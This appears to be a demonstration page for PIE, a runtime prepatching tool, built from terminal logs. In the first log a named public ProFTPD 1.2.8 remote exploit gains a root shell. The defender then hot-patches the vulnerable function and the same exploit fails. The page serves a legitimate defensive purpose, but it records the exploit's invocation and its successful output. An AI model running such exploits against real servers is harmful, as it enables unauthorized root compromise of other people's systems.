News
Download
Prepatch
Documentation
Contact
|
PIE Working Example
The following is an example of PIE being used to prevent what would otherwise be a successful exploit attempt. For the sake of this example, consider two connected hosts "target" and "attacker". Let us first present the view of a successful attack on the ProFTPd server running on "target".
attacker@attacker:~$ ftp target
Connected to target.
220 ProFTPD 1.2.8 Server (ProFTPD Default Installation) [target]
Name (target:attacker): ftp
331 Anonymous login ok, send your complete email address as your password.
Password:
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 root root 48 Aug 26 20:51 incoming
226 Transfer complete.
ftp> exit
221 Goodbye.
attacker@attacker:~$ ./proftpd-not-pro-enough -d incoming target
: proftpd-not-pro-enough : ProFTPD remote exploit for CAN-2003-0831
by Solar Eclipse (solareclipse@phreedom.org)
: connecting to target
220 ProFTPD 1.2.8 Server (ProFTPD Default Installation) [target]
: loging in as anonymous/mozilla@
: using writable directory incoming, filename is ieuzuiqj
: exploiting server (offset 0xffff)
stage1 shellcode failed
: exploiting server (offset 0xfffe)
No reposnse from remote process. It probably crashed with a SIGILL and
is currently consuming 100% CPU. If you succeed in exploiting the server,
remember to kill runaway process
: exploiting server (offset 0xfc17)
stage1 shellcode failed
: exploiting server (offset 0xfc16)
stage1 shellcode failed
: exploiting server (offset 0xd8ef)
Execution of stage1 shellcode succeeded, sending stage2
bash: no job control in this shell
target:/home/ftp# Linux target 2.4.27-2-686 #1 Mon may 16 17:03:22 JST 2005 i686 GNU/Linux
uid=0(root) gid=1000(ftp) groups=1000(ftp),20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev)
07:46:01 up 7:17, 10 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 host:S.0 07:02 3:18 0.03s 0.03s /bin/bash
root pts/2 host:S.1 07:02 1:09 0.02s 0.02s /bin/bash
root pts/3 host:S.2 07:02 42.00s 0.05s 0.01s proftpd: (accep
root pts/5 host:S.4 07:02 35:33 0.01s 0.01s /bin/bash
root pts/6 host:S.5 07:02 43:08 0.01s 0.01s /bin/bash
root pts/7 host:S.6 07:02 43:06 0.01s 0.01s /bin/bash
root pts/8 host:S.7 07:02 43:05 0.01s 0.01s /bin/bash
root pts/10 host:S.9 07:02 3:54 0.02s 0.02s /bin/bash
target:/home/ftp# exit
exit
The attacker has gained root access to the target system. Let us now apply a prepatch for this vulnerability (the prepatch source can be found in the prepatch repository on this website).
target:~/devel# gcc -o proftpd_xlate_write proftpd_xlate_write.c -lpie
target:~/devel# ./proftpd_xlate_write
----------------
begin proftpd_xlate_write.pp
version 0.5
target proftpd
function _xlate_ascii_write
----------------
AV94bGF0ZV9hc2NpaV93cml0ZQA2AAAAVYnlMcmLRQiLAIA4AHQJgDgKdQFBQOvygfkAAgAAfAUxwEDNgItFFFCLRRBQi0UMUItFCFC6u7u7u//Sg8QQycMQAAAA
----------------
target:~/devel# ./proftpd_xlate_write > proftpd_xlate_write.pp
target:~/devel# pfp -v -f _xlate_ascii_write -o proftpd_xlate_write.pf proftpd.unstripped
V: Pfp version 0.5
V: Using binary path: proftpd.unstripped
V: Using function name: _xlate_ascii_write
V: Using output file: proftpd_xlate_write.pf
V: Found text at: 0x2af0 (0x44720 bytes)
V: Found symtab at: 0x58550 (0x5e20 bytes)
V: Found strtab at: 0x5e370 (0x53b8 bytes)
V: Target function match: 0x8061e10
V: Target function offset: 0x17320
V: Target function size: 0x1d0
V: Primary fingerprint structure blocks: 22
V: Primary fingerprint structure links: 34
V: Primary fingerprint outgoing call count: 8
V: Secondary fingerprint incoming call count: 1
V: Secondary fingerprint stack frame size: 0x1c
V: Tertiary fingerprint function map entries: 25
target:~/devel# pie -v proftpd_xlate_write.pp proftpd_xlate_write.pf
V: PIE version: 0.5
V: Linkmap found at: 0x40016ed8
A function has been found that matches the primary fingerprint.
Details:
fingerprint name: _xlate_ascii_write
function offset: 0x17320
structural blocks: 22
structural links: 34
outgoing calls: 8
incoming calls: 1
stack frame size: 0x1c
Options:
1. Use this function
2. Exit without patching
Enter choice [default=2]: 1
V: Function _xlate_ascii_write found at: 0x8061e10
V: Patching target pid: 25937
V: Redirected _xlate_ascii_write to: 0x80990e4
target:~/devel#
The main proftpd process has been successfully prepatched. It is now time to attempt the exploit once again.
attacker@attacker:~$ ./proftpd-not-pro-enough -d incoming target
: proftpd-not-pro-enough : ProFTPD remote exploit for CAN-2003-0831
by Solar Eclipse (solareclipse@phreedom.org)
: connecting to target
220 ProFTPD 1.2.8 Server (ProFTPD Default Installation) [target]
: loging in as anonymous/mozilla@
: using writable directory incoming, filename is ilxbifpk
: exploiting server (offset 0xffff)
stage1 shellcode failed
: exploiting server (offset 0xfffe)
stage1 shellcode failed
: exploiting server (offset 0xfc17)
stage1 shellcode failed
: exploiting server (offset 0xfc16)
stage1 shellcode failed
: exploiting server (offset 0xd8ef)
stage1 shellcode failed
: exploiting server (offset 0xd8ee)
stage1 shellcode failed
Exploit failed. :-(
attacker@attacker:~$ ftp target
Connected to target.
220 ProFTPD 1.2.8 Server (ProFTPD Default Installation) [target]
Name (target:attacker): ftp
331 Anonymous login ok, send your complete email address as your password.
Password:
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 root root 48 Aug 26 20:51 incoming
226 Transfer complete.
ftp> exit
221 Goodbye.
The exploit has failed, and the ftp server is still in working condition.
|